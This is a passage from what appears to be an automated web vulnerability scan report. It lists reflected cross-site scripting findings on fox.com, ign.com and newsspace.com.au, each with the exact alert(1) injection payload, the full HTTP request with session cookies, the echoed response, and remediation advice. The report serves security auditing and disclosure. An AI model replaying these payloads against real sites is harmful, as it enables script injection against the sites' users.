Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.110
Content-Type: text/html; charset=utf-8
Content-Length: 21833
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player36edf"-alert(1)-"96f3cfa2d32videoxml"
s_analytics.hier1="fox:shows:_ui:fox_player36edf"-alert(1)-"96f3cfa2d32videoxml" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player36edf"-alert(1)-"96f3cfa
...[SNIP]...

1.179. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js/combinedjs.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 575b6"-alert(1)-"e3dfa6a0a2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui575b6"-alert(1)-"e3dfa6a0a2e/js/combinedjs.php?page=tracking HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%255D%7C1475608962059%3B%20s_vnum%3D1320123600936%2526vn%253D3%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317758115849%3B%20s_dayslastvisit%3D1317756315852%7C1412364315852%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758115852%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.101
Content-Type: text/html; charset=utf-8
Content-Length: 21831
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:08:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui575b6"-alert(1)-"e3dfa6a0a2e:jscombinedjs"
s_analytics.hier1="fox:shows:_ui575b6"-alert(1)-"e3dfa6a0a2e:jscombinedjs" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui575b6"-alert(1)-"e3dfa6a0a2e:jscombi
...[SNIP]...

1.180. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js/combinedjs.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8760"-alert(1)-"1dac83bc5b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/jse8760"-alert(1)-"1dac83bc5b5/combinedjs.php?page=tracking HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%255D%7C1475608962059%3B%20s_vnum%3D1320123600936%2526vn%253D3%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317758115849%3B%20s_dayslastvisit%3D1317756315852%7C1412364315852%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758115852%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.117
Content-Type: text/html; charset=utf-8
Content-Length: 21803
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:08:54 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:jse8760"-alert(1)-"1dac83bc5b5combinedjs"
s_analytics.hier1="fox:shows:_ui:jse8760"-alert(1)-"1dac83bc5b5combinedjs" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:jse8760"-alert(1)-"1dac83bc5b5combined
...[SNIP]...

1.181. http://www.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60cfa"><script>alert(1)</script>f5202b2023e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?60cfa"><script>alert(1)</script>f5202b2023e=1 HTTP/1.1
Host: www.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newscorp.com/operations/other.html#
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=1.2111014431.1317753408.1317753408.1317753408.1; __utmz=1.1317753408.1.1.utmccn=(referral)|utmcsr=newscorp.com|utmcct=/management/ndm.html|utmcmd=referral; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317753406.1317756133.2; __utmz=173446715.1317756133.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317756133746%7C1412364133746%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757933746%3B; rsi_segs=; _chartbeat2=wv9yj68rlyzfi46p.1317753412044

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 20:08:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:08:38 GMT
Content-Length: 95193
Connection: close
Vary: Accept-Encoding
Set-Cookie: freq=c-1317758914106v-4n-12mc+1317758914106mv+4mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=rivq9nyyyl63;Path=/includes
Set-Cookie: JSESSIONID=2ibcigl3g2ag2;Path=/includes
Set-Cookie: JSESSIONID=f5ip1gfp6sa;Path=/includes
Set-Cookie: JSESSIONID=oamcggqq4ah6;Path=/includes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://www.ign.com/?60cfa"><script>alert(1)</script>f5202b2023e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.182. http://www.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7dcf"-alert(1)-"19caa501bc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?a7dcf"-alert(1)-"19caa501bc7=1 HTTP/1.1
Host: www.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newscorp.com/operations/other.html#
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=1.2111014431.1317753408.1317753408.1317753408.1; __utmz=1.1317753408.1.1.utmccn=(referral)|utmcsr=newscorp.com|utmcct=/management/ndm.html|utmcmd=referral; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317753406.1317756133.2; __utmz=173446715.1317756133.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317756133746%7C1412364133746%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757933746%3B; rsi_segs=; _chartbeat2=wv9yj68rlyzfi46p.1317753412044

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 20:08:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:08:45 GMT
Content-Length: 95134
Connection: close
Vary: Accept-Encoding
Set-Cookie: freq=c-1317758923156v-8n-12mc+1317758923156mv+8mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=17quqprxngee6;Path=/includes
Set-Cookie: JSESSIONID=7ftgm1kdh5kke;Path=/includes
Set-Cookie: JSESSIONID=6r955ega3eltd;Path=/includes
Set-Cookie: JSESSIONID=mgkyd24htr9d;Path=/includes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://www.ign.com/?a7dcf"-alert(1)-"19caa501bc7=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.183. http://www.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c803"><script>alert(1)</script>0df4efac27e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/features.html?1c803"><script>alert(1)</script>0df4efac27e=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:54:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317765257189v-180n-12mc+1317765257189mv+180mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 137148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Video Game Reviews
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://www.ign.com/index/features.html?1c803"><script>alert(1)</script>0df4efac27e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.184. http://www.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19b69"-alert(1)-"9a9ea4a4bdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/features.html?19b69"-alert(1)-"9a9ea4a4bdc=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:54:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317765260190v-184n-12mc+1317765260190mv+184mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 137085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Video Game Reviews
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://www.ign.com/index/features.html?19b69"-alert(1)-"9a9ea4a4bdc=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.185. http://www.ign.com/videos/2011/08/15/batman-arkham-city-mr-freeze-trailer [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /videos/2011/08/15/batman-arkham-city-mr-freeze-trailer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1cf7b<script>alert(1)</script>d47d2b4ac26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/2011/08/15/batman-arkham-city-mr-freeze-trailer?1cf7b<script>alert(1)</script>d47d2b4ac26=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Expires: Tue, 04 Oct 2011 21:54:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
xmlns:og="http:
...[SNIP]...
<div id="videopageurl" class="toClipboard" style="display:none">http://www.ign.com/videos/2011/08/15/batman-arkham-city-mr-freeze-trailer?1cf7b<script>alert(1)</script>d47d2b4ac26=1</div>
...[SNIP]...

1.186. http://www.ign.com/videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a799f<script>alert(1)</script>e8dd4602a2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2?a799f<script>alert(1)</script>e8dd4602a2f=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Expires: Tue, 04 Oct 2011 21:54:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
xmlns:og="http:
...[SNIP]...
<div id="videopageurl" class="toClipboard" style="display:none">http://www.ign.com/videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2?a799f<script>alert(1)</script>e8dd4602a2f=1</div>
...[SNIP]...

1.187. http://www.ign.com/videos/2011/09/15/rage-launch-trailer [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /videos/2011/09/15/rage-launch-trailer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3f414<script>alert(1)</script>1d9dc8200f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/2011/09/15/rage-launch-trailer?3f414<script>alert(1)</script>1d9dc8200f4=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Expires: Tue, 04 Oct 2011 21:54:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
xmlns:og="http:
...[SNIP]...
<div id="videopageurl" class="toClipboard" style="display:none">http://www.ign.com/videos/2011/09/15/rage-launch-trailer?3f414<script>alert(1)</script>1d9dc8200f4=1</div>
...[SNIP]...

1.188. http://www.ign.com/videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 14433<script>alert(1)</script>5e2c9dc9589 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer?14433<script>alert(1)</script>5e2c9dc9589=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Expires: Tue, 04 Oct 2011 21:54:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
xmlns:og="http:
...[SNIP]...
<div id="videopageurl" class="toClipboard" style="display:none">http://www.ign.com/videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer?14433<script>alert(1)</script>5e2c9dc9589=1</div>
...[SNIP]...

1.189. http://www.newsspace.com.au/digital [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsspace.com.au
Path:   /digital

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31334"%3bd8a0fd0d83 was submitted in the REST URL parameter 1. This input was echoed as 31334";d8a0fd0d83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /digital31334"%3bd8a0fd0d83 HTTP/1.1
Host: www.newsspace.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LiteSpeed
Last-Modified: Tue, 04 Oct 2011 21:37:46 GMT
Content-Type: text/html; charset=utf-8
X-Server: http1.vega
Expires: Tue, 04 Oct 2011 21:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<![CDATA[
                       $(function (){
                           $("#main_menu-digital31334";d8a0fd0d83")
                               .addClass("current")
                               .find(">
...[SNIP]...

1.190. http://www.newsspace.com.au/digital [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsspace.com.au
Path:   /digital

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0e9"><img%20src%3da%20onerror%3dalert(1)>873c82dc86e was submitted in the REST URL parameter 1. This input was echoed as bf0e9"><img src=a onerror=alert(1)>873c82dc86e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /digitalbf0e9"><img%20src%3da%20onerror%3dalert(1)>873c82dc86e HTTP/1.1
Host: www.newsspace.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LiteSpeed
Last-Modified: Tue, 04 Oct 2011 21:37:46 GMT
Content-Type: text/html; charset=utf-8
X-Server: http1.vega
Expires: Tue, 04 Oct 2011 21:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<div style="padding: 0px 19px 19px 19px" id="digitalbf0e9"><img src=a onerror=alert(1)>873c82dc86e_content_section">
...[SNIP]...

1.191. http://www.newsspace.com.au/news.com.au [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsspace.com.au
Path:   /news.com.au

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ca6"><img%20src%3da%20onerror%3dalert(1)>971828b2e2b was submitted in the REST URL parameter 1. This input was echoed as 17ca6"><img src=a onerror=alert(1)>971828b2e2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news.com.au17ca6"><img%20src%3da%20onerror%3dalert(1)>971828b2e2b HTTP/1.1
Host: www.newsspace.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LiteSpeed
Last-Modified: Tue, 04 Oct 2011 21:37:46 GMT
Content-Type: text/html; charset=utf-8
X-Server: http1.vega
Expires: Tue, 04 Oct 2011 21:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<div style="padding: 0px 19px 19px 19px" id="news.com.au17ca6"><img src=a onerror=alert(1)>971828b2e2b_content_section">
...[SNIP]...

1.192. http://www.newsspace.com.au/news.com.au [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsspace.com.au
Path:   /news.com.au

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16009"%3ba1ac7d093df was submitted in the REST URL parameter 1. This input was echoed as 16009";a1ac7d093df in the application's response.

